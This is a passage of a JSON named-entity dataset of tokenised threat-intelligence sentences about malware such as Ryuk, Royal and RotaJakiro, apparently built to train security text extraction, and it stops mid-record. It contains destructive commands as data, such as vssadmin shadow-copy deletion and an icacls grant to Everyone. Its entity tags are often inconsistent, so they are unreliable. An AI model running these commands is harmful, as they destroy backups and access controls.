"tokens": [ - "When", - "executing", - "with", - "non-root", - "permissions,", - "RotaJakiro", - "uses", - "the", - "the", - "`shmget", - "API`", - "to", - "create", - "shared", - "memory", - "between", - "other", - "known", - "RotaJakiro", - "processes.", - "This", - "allows", - "processes", - "to", - "communicate", - "with", - "each", - "other", - "and", - "share", - "their", - "PID." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Purp", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "has", - "used", - "the", - "filename", - "`systemd-daemon`", - "in", - "an", - "attempt", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "executing", - "with", - "non-root", - "permissions,", - "RotaJakiro", - "uses", - "the", - "the", - "`shmget`", - "API", - "to", - "create", - "shared", - "memory", - "between", - "other", - "known", - "RotaJakiro", - "processes.", - "RotaJakiro", - "also", - "uses", - "the", - "`execvp`", - "API", - "to", - "help", - "its", - "dead", - "process", - "\"resurrect\"." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Purp", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "uses", - "a", - "custom", - "binary", - "protocol", - "using", - "a", - "type,", - "length,", - "value", - "format", - "over", - "TCP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "uses", - "a", - "custom", - "binary", - "protocol", - "over", - "TCP", - "port", - "443." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "can", - "monitor", - "the", - "`/proc/[PID]`", - "directory", - "of", - "known", - "RotaJakiro", - "processes", - "as", - "a", - "part", - "of", - "its", - "persistence", - "when", - "executing", - "with", - "non-root", - "permissions.", - "If", - "the", - "process", - "is", - "found", - "dead,", - "it", - "resurrects", - "the", - "process.", - "RotaJakiro", - "processes", - "can", - "be", - "matched", - "to", - "an", - "associated", - "Advisory", - "Lock,", - "in", - "the", - "`/proc/locks`", - "folder,", - "to", - "ensure", - "it", - "doesn't", - "spawn", - "more", - "than", - "one", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "uses", - "dynamically", - "linked", - "shared", - "libraries", - "(`.so`", - "files)", - "to", - "execute", - "additional", - "functionality", - "using", - "`dlopen()`", - "and", - "`dlsym()`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "uses", - "ZLIB", - "Compression", - "to", - "compresses", - "data", - "sent", - "to", - "the", - "C2", - "server", - "in", - "the", - "`payload`", - "section", - "network", - "communication", - "packet." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RotaJakiro", - "encrypts", - "C2", - "communication", - "using", - "a", - "combination", - "of", - "AES,", - "XOR,", - "ROTATE", - "encryption,", - "and", - "ZLIB", - "compression." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "RotaJakiro", - "executes", - "a", - "set", - "of", - "commands", - "to", - "collect", - "device", - "information,", - "including", - "`uname`.", - "Another", - "example", - "is", - "the", - "`cat", - "/etc/*release", - "|", - "uniq`", - "command", - "used", - "to", - "collect", - "the", - "current", - "OS", - "distribution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Depending", - "on", - "the", - "Linux", - "distribution", - "and", - "when", - "executing", - "with", - "root", - "permissions,", - "RotaJakiro", - "may", - "install", - "persistence", - "using", - "a", - "`.service`", - "file", - "under", - "the", - "`/lib/systemd/system/`", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "executing", - "with", - "non-root", - "level", - "permissions,", - "RotaJakiro", - "can", - "install", - "persistence", - "by", - "adding", - "a", - "command", - "to", - "the", - ".bashrc", - "file", - "that", - "executes", - "a", - "binary", - "in", - "the", - "`${HOME}/.gvfsd/.profile/`", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "When", - "executing", - "with", - "user-level", - "permissions,", - "RotaJakiro", - "can", - "install", - "persistence", - "using", - "a", - ".desktop", - "file", - "under", - "the", - "`$HOME/.config/autostart/`", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Rover", - "automatically", - "collects", - "files", - "from", - "the", - "local", - "system", - "and", - "removable", - "drives", - "based", - "on", - "a", - "predefined", - "list", - "of", - "file", - "extensions", - "on", - "a", - "regular", - "timeframe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "automatically", - "searches", - "for", - "files", - "on", - "local", - "drives", - "based", - "on", - "a", - "predefined", - "list", - "of", - "file", - "extensions", - "and", - "sends", - "them", - "to", - "the", - "command", - "and", - "control", - "server", - "every", - "60", - "minutes.", - "Rover", - "also", - "automatically", - "sends", - "keylogger", - "files", - "and", - "screenshots", - "to", - "the", - "C2", - "server", - "on", - "a", - "regular", - "timeframe." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "searches", - "for", - "files", - "on", - "local", - "drives", - "based", - "on", - "a", - "predefined", - "list", - "of", - "file", - "extensions." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "searches", - "for", - "files", - "on", - "attached", - "removable", - "drives", - "based", - "on", - "a", - "predefined", - "list", - "of", - "file", - "extensions", - "every", - "five", - "seconds." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "automatically", - "searches", - "for", - "files", - "on", - "local", - "drives", - "based", - "on", - "a", - "predefined", - "list", - "of", - "file", - "extensions." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "has", - "keylogging", - "functionality." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "copies", - "files", - "from", - "removable", - "drives", - "to", - "<code>C:\\system</code>." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "has", - "functionality", - "to", - "remove", - "Registry", - "Run", - "key", - "persistence", - "as", - "a", - "cleanup", - "procedure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rover", - "persists", - "by", - "creating", - "a", - "Registry", - "entry", - "in", - "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Rover", - "takes", - "screenshots", - "of", - "the", - "compromised", - "system's", - "desktop", - "and", - "saves", - "them", - "to", - "<code>C:\\system\\screenshot.bmp</code>", - "for", - "exfiltration", - "every", - "60", - "minutes." - ], - "ner_tags": [ - "B-HackOrg", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "uses", - "a", - "multi-threaded", - "encryption", - "process", - "that", - "can", - "partially", - "encrypt", - "targeted", - "files", - "with", - "the", - "OpenSSL", - "library", - "and", - "the", - "AES256", - "algorithm." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "identify", - "specific", - "files", - "and", - "directories", - "to", - "exclude", - "from", - "the", - "encryption", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "delete", - "shadow", - "copy", - "backups", - "with", - "vssadmin.exe", - "using", - "the", - "command", - "`delete", - "shadows", - "/all", - "/quiet`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "use", - "multiple", - "APIs", - "for", - "discovery,", - "communication,", - "and", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Royal", - "can", - "scan", - "the", - "network", - "interfaces", - "of", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "enumerate", - "the", - "shared", - "resources", - "of", - "a", - "given", - "IP", - "addresses", - "using", - "the", - "API", - "call", - "`NetShareEnum`." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "establishes", - "a", - "TCP", - "socket", - "for", - "C2", - "communication", - "using", - "the", - "API", - "`WSASocketW`." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Royal", - "has", - "been", - "spread", - "through", - "the", - "use", - "of", - "phishing", - "campaigns", - "including", - "\"call", - "back", - "phishing\"", - "where", - "victims", - "are", - "lured", - "into", - "calling", - "a", - "number", - "provided", - "through", - "email." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "I-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Royal", - "can", - "use", - "`GetCurrentProcess`", - "to", - "enumerate", - "processes." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "use", - "SMB", - "to", - "connect", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "use", - "`RmShutDown`", - "to", - "kill", - "applications", - "and", - "services", - "using", - "the", - "resources", - "that", - "are", - "targeted", - "for", - "encryption." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "use", - "`GetNativeSystemInfo`", - "and", - "`GetLogicalDrives`", - "to", - "enumerate", - "system", - "processors", - "and", - "logical", - "drives." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Royal", - "can", - "enumerate", - "IP", - "addresses", - "using", - "`GetIpAddrTable`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rubeus", - "can", - "reveal", - "the", - "credentials", - "of", - "accounts", - "that", - "have", - "Kerberos", - "pre-authentication", - "disabled", - "through", - "AS-REP", - "roasting." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rubeus", - "can", - "gather", - "information", - "about", - "domain", - "trusts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rubeus", - "can", - "forge", - "a", - "ticket-granting", - "ticket." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rubeus", - "can", - "use", - "the", - "`KerberosRequestorSecurityToken.GetRequest`", - "method", - "to", - "request", - "kerberoastable", - "service", - "tickets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rubeus", - "can", - "create", - "silver", - "tickets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Ruler", - "can", - "be", - "used", - "to", - "enumerate", - "Exchange", - "users", - "and", - "dump", - "the", - "GAL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-Org", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ruler", - "can", - "be", - "used", - "to", - "automate", - "the", - "abuse", - "of", - "Outlook", - "Forms", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ruler", - "can", - "be", - "used", - "to", - "automate", - "the", - "abuse", - "of", - "Outlook", - "Home", - "Pages", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ruler", - "can", - "be", - "used", - "to", - "automate", - "the", - "abuse", - "of", - "Outlook", - "Rules", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "contains", - "code", - "to", - "compress", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "contains", - "code", - "to", - "clear", - "event", - "logs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "RunningRAT", - "contains", - "code", - "to", - "open", - "and", - "copy", - "data", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "kills", - "antimalware", - "running", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "contains", - "code", - "to", - "delete", - "files", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "captures", - "keystrokes", - "and", - "sends", - "them", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "adds", - "itself", - "to", - "the", - "Registry", - "key", - "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "to", - "establish", - "persistence", - "upon", - "reboot." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "gathers", - "the", - "OS", - "version,", - "logical", - "drives", - "information,", - "processor", - "information,", - "and", - "volume", - "information." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "RunningRAT", - "uses", - "a", - "batch", - "file", - "to", - "kill", - "a", - "security", - "program", - "task", - "and", - "then", - "attempts", - "to", - "remove", - "itself." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "attempted", - "to", - "adjust", - "its", - "token", - "privileges", - "to", - "have", - "the", - "<code>SeDebugPrivilege</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "used", - "a", - "combination", - "of", - "symmetric", - "(AES)", - "and", - "asymmetric", - "(RSA)", - "encryption", - "to", - "encrypt", - "files.", - "Files", - "have", - "been", - "encrypted", - "with", - "their", - "own", - "AES", - "key", - "and", - "given", - "a", - "file", - "extension", - "of", - ".RYK.", - "Encrypted", - "directories", - "have", - "had", - "a", - "ransom", - "note", - "of", - "RyukReadMe.txt", - "written", - "to", - "the", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "stopped", - "services", - "related", - "to", - "anti-virus." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "can", - "use", - "stolen", - "domain", - "admin", - "accounts", - "to", - "move", - "laterally", - "within", - "a", - "victim", - "domain." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "enumerated", - "files", - "and", - "folders", - "on", - "all", - "mounted", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "used", - "<code>vssadmin", - "Delete", - "Shadows", - "/all", - "/quiet</code>", - "to", - "to", - "delete", - "volume", - "shadow", - "copies", - "and", - "<code>vssadmin", - "resize", - "shadowstorage</code>", - "to", - "force", - "deletion", - "of", - "shadow", - "copies", - "created", - "by", - "third-party", - "applications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "can", - "create", - ".dll", - "files", - "that", - "actually", - "contain", - "a", - "Rich", - "Text", - "File", - "format", - "document." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "constructed", - "legitimate", - "appearing", - "installation", - "folder", - "paths", - "by", - "calling", - "<code>GetWindowsDirectoryW</code>", - "and", - "then", - "inserting", - "a", - "null", - "byte", - "at", - "the", - "fourth", - "character", - "of", - "the", - "path.", - "For", - "Windows", - "Vista", - "or", - "higher,", - "the", - "path", - "would", - "appear", - "as", - "<code>C:\\Users\\Public</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "used", - "multiple", - "native", - "APIs", - "including", - "<code>ShellExecuteW</code>", - "to", - "run", - "executables,<code>GetWindowsDirectoryW</code>", - "to", - "create", - "folders,", - "and", - "<code>VirtualAlloc</code>,", - "<code>WriteProcessMemory</code>,", - "and", - "<code>CreateRemoteThread</code>", - "for", - "process", - "injection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-HackOrg", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "can", - "use", - "anti-disassembly", - "and", - "code", - "transformation", - "obfuscation", - "techniques." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "called", - "<code>CreateToolhelp32Snapshot</code>", - "to", - "enumerate", - "all", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "injected", - "itself", - "into", - "remote", - "processes", - "to", - "encrypt", - "files", - "using", - "a", - "combination", - "of", - "<code>VirtualAlloc</code>,", - "<code>WriteProcessMemory</code>,", - "and", - "<code>CreateRemoteThread</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "used", - "the", - "Windows", - "command", - "line", - "to", - "create", - "a", - "Registry", - "entry", - "under", - "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "used", - "the", - "C$", - "network", - "share", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "can", - "remotely", - "create", - "a", - "scheduled", - "task", - "to", - "execute", - "itself", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "called", - "<code>kill.bat</code>", - "for", - "stopping", - "services,", - "disabling", - "services", - "and", - "killing", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "I-Idus", - "O", - "B-Idus", - "I-Idus", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "called", - "<code>GetLogicalDrives</code>", - "to", - "emumerate", - "all", - "mounted", - "drives,", - "and", - "<code>GetDriveTypeW</code>", - "to", - "determine", - "the", - "drive", - "type." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "been", - "observed", - "to", - "query", - "the", - "registry", - "key", - "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language</code>", - "and", - "the", - "value", - "<code>InstallLanguage</code>.", - "If", - "the", - "machine", - "has", - "the", - "value", - "0x419", - "(Russian),", - "0x422", - "(Ukrainian),", - "or", - "0x423", - "(Belarusian),", - "it", - "stops", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "called", - "<code>GetIpNetTable</code>", - "in", - "attempt", - "to", - "identify", - "all", - "mounted", - "drives", - "and", - "hosts", - "that", - "have", - "Address", - "Resolution", - "Protocol", - "(ARP)", - "entries." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "used", - "Wake-on-Lan", - "to", - "power", - "on", - "turned", - "off", - "systems", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "has", - "used", - "<code>cmd.exe</code>", - "to", - "create", - "a", - "Registry", - "entry", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ryuk", - "can", - "launch", - "<code>icacls", - "<path>", - "/grant", - "Everyone:F", - "/T", - "/C", - "/Q</code>", - "to", - "delete", - "every", - "access-based", - "restrictions", - "on", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "deleted", - "accounts", - "it", - "has", - "created." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "uploaded", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "primarily", - "uses", - "port", - "80", - "for", - "C2,", - "but", - "falls", - "back", - "to", - "ports", - "443", - "or", - "8080", - "if", - "initial", - "communication", - 